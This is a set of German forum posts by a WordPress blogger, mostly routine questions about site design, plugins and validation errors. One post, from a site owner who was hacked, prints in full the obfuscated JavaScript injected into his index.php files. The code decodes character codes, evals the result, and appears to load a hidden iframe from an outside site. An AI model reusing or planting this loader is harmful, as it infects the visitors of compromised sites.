ich habe nocheinmal alle daten aus meinem webspace (ich habe keinen eigenen server) analysiert. an dem tag, wurden wirklich nur die index.php dateiEN (unterverzeichnisse...) editiert.
ich habe auch nochmal alles nach htacces datein und scripts abgesucht - nichts...
Beiträge von go-seven
-
-
ok, ich glaube, wir reden aneinander vorbei.
1. ich war zum zeitpunkt der dateiveränderung (24.08.2011 gegen 23:30, ab da gabs keine nutzer mehr...) im tiefschlaf --> keiner meiner rechner an.
2. daraus lässt sich schließen, das der angriff NICHT von meinem PC aus ausgeführt wurde.was ich aber IMMERNOCH wissen will ist, um was für einen code es sich handelt (siche oben!) - was macht der (ausser den content ausblenden)
und
hatte schon mal jmd ähnliche probleme?und:
Die - mit der man auf deinem Sytem bestehende PHP-Scripte verändern darf.
wenns nicht genauer geht kann ich auf deine hilfe verzichten. das es ein sicherheitsleck gibt war mir schon klar.
Achso: Ich ahbe mal gegooglet. es gibt noch mehr seiten, die diesen code schnipsel im quelltext haben... einige davon sind von google mit einer warnung versehen wurden von wegen " diese seite könnte ihren pc infizieren" -
-
also ich nutze AUSSCHLIESSLICH ubuntu / linux... - damit dürfte sich die idee mit dem virus erledigt haben, oder?
aber mal ernsthaft, kann mir jemand etwas zu diesen code sagen?
die fremdscripts sind raus.
Ralf welche sicherheitslücke meinst du? -
Hallo, ich habe mit meinem Wordpress folgendes Problem: Aus unerfindlichen Gründen werden ALLE (!!!) index.php Dateien auf meinem Webspace modifiziert. Dies ist jetzt schon zum zweiten mal passiert, und steht in keinem Zusammenhang mit Updates / Änderungen am Webserver / CMS ...
Folgender Code wird immer eingefügt:
PHP<html><body><script>String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,114-h,109-h,110-h,113-h,43-h,107-h,95-h,103-h,106-h,113-h,44-h,97-h,109-h,107-h,45-h,103-h,108-h,98-h,99-h,118-h,44-h,102-h,114-h,107-h,106-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,114-h,109-h,110-h,113-h,43-h,107-h,95-h,103-h,106-h,113-h,44-h,97-h,109-h,107-h,45-h,103-h,108-h,98-h,99-h,118-h,44-h,102-h,114-h,107-h,106-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script></body></html>Dabei variieren im Mittelteil die Zahlen.
Kann mir IRGENDWER Informationen zu diesem Problem geben? Ich habe schon alle Passwörter (MySQL, FTP...) geändert.
MfG Pascal
-
Ich suche nach etwas ganz Speziellem...
Einem Plugin, welches, sobald man auf einen externen Link klickt oder auf einen Download-Link klickt (bei mir auch externe Adresse) eine Art "Zwischenseite" anzeigt (auf der dann eine Werbeanzeige steht). Dann soll es nach (meinetwegen) 5 Sekunden weiter, und der Download (oder das Laden der externen Seite) kann beginnen...
MfG Pascal
PS: Es geht einfach darum, dass die Downloads (logischerweise) sehr begehrt sind, und ich somit am einfachsten meine Internetseite finanzieren kann...
-
danke. hat geklappt!
-
Grafik in Vordergrund
Hallo Leute,
ich habe mal wider was, um eure Köpfe anzustregen. Ich würde gern mit einem Codeschnipsel (HTML / PHP) eine Grafik oben links über meiner platzieren - um es genau zu sagen ein png - grafik mit 200 mal 140 pixeln. wichtig dabei: per link soll es weitergehen, ganz wichtig ist auch das transparenz möglich ist.
mfg pascal
ps: meine page = http://go-seven.de :-P -
Ich habe vor, in meinem Blog die Grafik hinter der Überschrift durch ein SWF zu ersetzen... ich vermute die Änderung in der header.php oder style.css vornehmen muss - aber wo und wie bin ich mir noch nicht im klaren.
deshalb hoffe ich auf eure simple hilfe!
thx im vorraus!EDIT: in styles.css fand ich diese zeile:
wie muss ich die umbasteln? -
Hallo,
gestern habe ich einen weiteren domain auf meine seite aufgeschalten. funzt ganz gut. jetzt hab gleich in wordpress diesen domain be Einstallungen --> Allgemein --> WordPress-Adresse (URL) eingetragen - Blog-Adresse (URL) ließ ich frei.
der blog ist zwar erreichbar, aber wenn man versucht sich einzuloggen, kommt nach der eingabe nur eine leere, weise seite.
was kann ich tun, bzw, wo kann ich den alten url wieder eintragen, sodass es erstmal wieder funzt?[EDIT]
Fehler gefunden:...manchmal setzts halt aus
-
Hallo liebe Community,
seit einem halben Jahr baue ich unter der Adresse "go-seven.de" ein kleines Newsportal mit Technews, Tipps und Tricks mit einem Bekannten auf. Dieser ist aber aus beruflichen gründen momentan im Ausland, daher suche ich einen Blogger, oder einen der ein solcher werden will, um mein Webprojekt redaktionell zu unterstützen.
Es geht weder darum unter Zwang 2 Artikel pro Tag zu veröffentlichen, noch um Profit zu machen. Ihr müsstet nur 1 bis 2 mal pro Woche einen kleinen Artikel (50-150 Wörter) zu aktuellen Themen aus den Bereichen Toolvorstellung, Techniknews, Tipps oder Tricks schreiben, was ein Aufwand von weniger als 2 Stunden pro Woche ist.
Wir haben vor 7 Monaten mit 15 Besuchern / Tag angefangen und erreichen derzeit bis zu 100 Besucher / Tag.
Unser kurzfristiges Ziel ist es auf 150 Besucher / Tag aufzusteigen und im Pageranksystem auf 5 zu steigen.Also zusammengefasst: Wir suchen einen Autor / Blogger für ein kleines Bisschen Arbeit mit viel Spaß.
MfG Pascal Tippelt
PS: Ihr könnt euch hier im Forum oder unter kontakt@go-seven.de melden.
-
[SPAM]
keiner eine idee?
[/SPAM] -
Hallo Leute,
ich bin immermal auf diesem (= http://blog.zdf.de/zdfdasblog/ ) Blog unterewgs. Coll ist, das dieser nach aufrufen "eingeblendet" wird.
wie lässt sich das realisieren?
grüße pascal! -
so, seite überarbeitet, mit server umgezogen.
probierts nochmal!- was sagt die performance?
- wie findet ihr das design?
-
Ich habe mein Wordpress auf 2 Servern laufen, die ich Synchran halte mit der Import / Export funktion.
ich möchte nun, das wordpress dies selber erledigt.
PS: die server sind physikalisch voneinander getrennt (domain, hdd, sql, php alles woandern xD)grüße pascal
-
Hi Mädels;
ich baue unter der Adresse http://go-seven.de ein Kleines Newsportal auf. Hauptsächlich geht es um PC's, Windows, Liunux und co. Immermal gibt es kleine tutorials, aber auch immermal was persönliches, "aus meinem leben".guckts euch mal an, und schreibt was! kritik vertrag ich xD
PS: ich habe bei meinem hoster, strato, noch performance probleme. wenn ich die "echte" geschwindigkeit erleben wollt, nutz den clon: http://go-windows.ath.cx !
grüße pascal -
ok, soweit is das jetzt klar. aber wo muss ich zum korrigieren suchen(wenn ich in der ausgegeben html datei die fehler gefunden hab)? in den theme-php-dateien, oder wo?
EDIT: Ich hab schon mal 20 fehler gefunden, die lagen an einem programmierfehler bei add-meta-plugin.
jetzt sind wir "nur" noch bei 29. -
ich habe mir letztens mal meine seite auf "seitwert.de" bewerten lassen. ist ja ganz praktisch, damit man wiess, was man noch verbessern muss.
aufgefallen ist mir, das der W3C validator mir über 40 fehler anzeigte: http://validator.w3.org/check?uri=http…Validator/1.767
nun die frage: woran (design, oder wp allgemein ect) liegen diese fehler, und vor allem: WIE WERDE ICH SIE LOS?
wenn ich mir das richtig angesehen hab, sind meistens leerzeichen vor dem ">" . wo muss ich "basteln" um diese fehler weg zu krigen?
danke im vorraus, pascal
PS: meine page: http://go-seven.de